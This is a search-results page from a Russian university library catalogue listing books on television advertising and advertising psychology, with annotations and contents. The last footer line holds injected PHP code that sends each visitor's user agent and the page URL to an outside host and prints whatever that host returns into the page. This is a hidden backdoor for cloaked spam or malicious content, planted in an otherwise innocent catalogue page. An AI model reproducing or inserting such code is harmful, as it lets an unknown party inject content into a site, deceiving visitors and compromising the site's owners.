Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

155 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Телереклама")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 47
1. 
Фрумкин, Григорий Моисеевич. Введение в драматургию телерекламы [Текст] : Учеб. пособие для вузов по специальности 350700 "Реклама" / Г. М. Фрумкин, 2005. - 93, [2] с.
Держатели документа (Информация об экземплярах) 

<Телевизионное> <искусство> возникло и развивается как синтез кинематографического, театрального, музыкального и изобразительного искусства. В данной книге <драматургия> телевизионной рекламы рассматривается в той ее части, в которой она опирается на опыт драматургии <театра> и <кино>. Автор подробно рассказывает об особенностях работы над <сценариями> <рекламных> <сюжетов>, об основных элементах их <композиции> и структуры, об использовании в телевизионной рекламе эйзенштейновских принципов "монтажа аттракционов", о специфике политической рекламы и о многом другом. Книга адресована начинающим сценаристам, которым предстоит работать в области телевизионной рекламы.

2. 
Шуванов В. И. Психология рекламы [Текст] : Учеб. пособие для вузов / В. И. Шуванов, 2003. - 314, [1] с.

Учебное пособие написано в соответствии с государственным образовательным стандартом. В нем рассматриваются теоретические и прикладные проблемы психологии рекламы.

Для студентов вузов.

3. 
Песоцкий, Евгений Александрович. Современная реклама [Текст] : Теория и практика / Е. А. Песоцкий, 2003. - 347 с.
Держатели документа (Информация об экземплярах) 
4. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 2001. - 351, [1] с.
5. 
Костылева, Татьяна Александровна. Психология рекламной деятельности [Текст] : Конспект лекций / Т. А. Костылева, 2005. - 52 с.
Держатели документа (Информация об экземплярах) 

Конспект лекций предназначен для студентов специальности "Реклама". Его основная задача - помочь студентам получить необходимые теоретические знания и приобрести практические навыки <психологического> <обеспечения> <рекламной> <деятельности> посредством овладения <рекламными> <стратегиями> и <психотехнологиям>и эффективных <рекламных> <приемов> и кампаний.

Полный текст
6. 
Шубина, Ирина Борисовна. Основы драматургии и режиссуры рекламного видео [Текст] : Творч. мастерская рекламиста / И. Б. Шубина, 2004. - 319 с.
Держатели документа (Информация об экземплярах) 
7. 
Панкратов, Федор Григорьевич. Основы рекламы [Текст] : учеб. для вузов по специальности "Реклама" / Ф. Г. Панкратов, Ю. К. Баженов, В. Г. Шахурин, 2006. - 524, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 

Это восьмое, переработанное и дополненное издание учебника по <рекламной> <деятельности>, ранее издававшегося под названием "Рекламная деятельность". В нем с учетом передового зарубежного и отечественного опыта освещаются социально-психологические основы <рекламы>; основные средства <маркетинговых> <коммуникаций> и их применение в рекламе; <правовое регулирование> рекламной деятельности в РФ; классификации рекламных средств, их характеристика, эффективность применения.

Специальные разделы посвящены организации и управлению рекламной деятельностью, основам разработки <рекламных текстов>, организации <паблик рилейшнз> на предприятии и некоторым другим вопросам.

Для студентов вузов, работников рекламно-информационных агентств и рекламных служб, предпринимателей, а также слушателей школ бизнеса.

8. 
Творчество молодых: теория культуры, дизайн, реклама, полиграфия [Текст] : материалы IV междунар. науч.-практ. конф. студентов и аспирантов / ОмГТУ, 2005. - 227 с.
Оглавление 
  • Кичигина, Анастасия Георгиевна. Каменные бабы вне временного контекста / А. Г. Кичигина. - с.3-4
  • Кичигина, Анастасия Георгиевна. Идея всеобщей мифологии в трудах зарубежных и отечественных авторов / А. Г. Кичигина. - с.5-8
  • Коненко, С. А. Микроминиатюра как новое направление в искусстве / С. А. Коненко. - с.8-11
  • Марочкина, Светлана Станиславовна. BTL-Мероприятия как метод продвижения товаров / С. С. Марочкина, Г. А. Бондарь. - с.80-85
  • Марочкина, Светлана Станиславовна. Товар нашего времени- Product Plasement / С. С. Марочкина, Е. Евченко. - с.85-91
  • Марочкина, Светлана Станиславовна. Продвижение канцелярских брэндов на Омский рынок / С. С. Марочкина, Н. В. Пирогова. - с.117-122
  • Колбина, Елена Леонидовна. Исследование процессов высокоэластической деформации клеевых пленок / Е. Л. Колбина, Ю. А. Андринская. - с.160-166
  • Литунов, Сергей Николаевич. Исследования возможностей гибридного растра / С. Н. Литунов, Н. Биктагирова. - с.189-196
  • Варепо, Лариса Григорьевна. Структура упаковочных картонов / Л. Г. Варепо, Л. Ю. Сенаторов. - с.204-207
  • Щеглов, Сергей Александрович. К вопросу об объективных методах контроля натяжения сетчатой основы форм трафаретной печати / С. А. Щеглов, Д. С. Филатов. - с.214-217
Держатели документа (Информация об экземплярах) 
Полный текст
9. 
Кармин, Анатолий Соломонович. Психология рекламы [Текст] / А. С. Кармин, 2004. - 509, [1] с.
Ключевые слова 
ПСИХОЛОГИЧЕСКОЕ -- ВОЗДЕЙСТВИЕ -- РЕКЛАМНАЯ -- ПСИХОТЕХНИКА -- АССОЦИАТИВНОЕ -- МЫШЛЕНИЕ -- АССОЦИАТИВНАЯ -- МЕТОДИКА -- ВЕРБАЛЬНО-СУГГЕСТИВНАЯ -- ТЕХНИКА -- ТРАНСАКТНЫЙ -- МОТИВАЦИОННЫЙ -- АНАЛИЗ -- МОТИВАЦИЯ ПОКУПОК -- ИМИДЖ-СТРАТЕГИЯ -- ИМИДЖМЕЙКИНГ -- БРЭНДИНГ -- РЕКЛАМНЫЙ -- ДИЗАЙН -- РЕКЛАМНОЕ -- ОБЪЯВЛЕНИЕ -- ПСИХОЛОГИЯ -- ЦВЕТ -- ПЕЧАТНАЯ -- ВИТРИННАЯ -- УЛИЧНАЯ -- ТРАНСПОРТНАЯ -- РЕКЛАМА -- РАДИОРЕКЛАМА -- ТЕЛЕРЕКЛАМА -- ИНТЕРНЕТ -- ПОТРЕБИТЕЛЬ -- ЭКОНОМИЧЕСКАЯ -- ЭКОНОМИЧЕСКОЕ -- МЫШЛЕНИЕ -- КУЛЬТУРА -- ПОТРЕБИТЕЛЬСКОЕ -- ПОВЕДЕНИЕ
Оглавление 
  • О рекламе: ФЗ от 18.07.1995 №108-ФЗ. - с.453-471
  • Международный кодекс рекламной деятельности Международной торговой палаты. - с.472-481
  • Российский рекламный кодекс. - с.482-490
  • Свод обычаев и правил делового оборота рекламы на территории Российской Федерации. - с.491-497
10. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2002. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Песоцкий, Евгений Александрович. Современная реклама [Текст] : Теория и практика / Е. Песоцкий, 2001. - 315 с.
Держатели документа (Информация об экземплярах) 
12. 
Шенерт, Вальтер. Грядущая реклама [Текст] / В. Шенерт; А. М. Чунаков, 1999. - 300 с.
Держатели документа (Информация об экземплярах) 
13. 
Полукаров В. Л. Телерадиореклама [Текст] : Инновац. технологии: Учеб. пособие / В. Л. Полукаров, 1998. - 396 с.
Держатели документа (Информация об экземплярах) 
14. 
Эдвардс, Чарлз. Реклама в розничной торговле США [Текст] : Практ. пособие: Сокр. пер. с англ. / Ч. Эдвардс, Р. Браун, 1992. - 271 с.
Держатели документа (Информация об экземплярах) 
15. 
Гермогенова Л. Ю. Эффективная реклама в России. Практика и рекомендации [Текст] / Л. Ю. Гермогенова, 1994. - 252 с.
Держатели документа (Информация об экземплярах) 
16. 
Зыбкин, Андрей Владимирович. Параллельный мир: Реклама и Право [Текст] : Практ. решения для реклам. бизнеса / А. В. Зыбкин, В. Л. Полукаров; С. У. Григорян, 2000. - 244 с.
Держатели документа (Информация об экземплярах) 
17. 
Телерекламный бизнес [Текст] : Информ.-аналит. обеспечение / В. П. Коломиец, И. А. Полуэхтова, С. А. Васильев, 2001. - 392 с.
Держатели документа (Информация об экземплярах) 
18. 
Борисов, Борис Леонидович. Технология рекламы и PR [Текст] : Учеб. пособие / Б. Л. Борисов, 2001. - 617, [1] с.
Ключевые слова 
Реклама -- Паблик рилейшнз -- Маркетинговая коммуникация -- Товарный знак -- Бренд -- Франчайзинг -- Сми -- Средства массовой информации -- Имидж -- Стиль -- Pr -- Брендинг -- Учебник и пособие -- Crisis management -- ИНТЕРНЕТ - МАРКЕТИНГ -- БРЕНД -- БРЕНДИНГ -- ФРАНЧАЙЗИНГ -- ЗНАК ТОВАРНЫЙ -- СИМВОЛ -- СИМВОЛИКА -- РЕКЛАМА ПОЛИТИЧЕСКАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СРЕДСТВА МАССОВОЙ ИНФОРМАЦИИ -- СОЦИОЛОГИЯ прикладная -- МЕДИАПЛАНИРОВАНИЕ -- Фокус-группа -- МИФ -- ТОТАЛИТАРИЗМ -- ТЕЛЕРЕКЛАМА -- ИМИДЖМЕЙКЕР -- Маркетинг политический -- ИМИДЖ политический -- СТИЛЬ фирменный -- СТИЛЬ русский -- Типографика -- Кич - Реклама -- Модерн - Реклама -- ПОСТМОДЕРНИЗМ - Реклама -- АВАНГАРД - Реклама -- АВАНГАРД РУССКИЙ -- Кинореклама -- СТИЛЬ жизни -- Монтаж -- КЛИП -- Юмор - Реклама -- Семиотика -- Структурализм -- РЕКЛАМА - СЛОВАРЬ ТЕРМИНОВ
19. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. для специальности "Маркетинг" / Е. В. Ромат, 2000. - 479 с.
Держатели документа (Информация об экземплярах) 
20. 
Саркисян О. А. Конспект рекламиста [Текст] / О. А. Саркисян, О. А. Груздева, Г. В. Красовский, 1999. - 133 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3048 - 14.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.74 с.12 запросов, 0.37c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;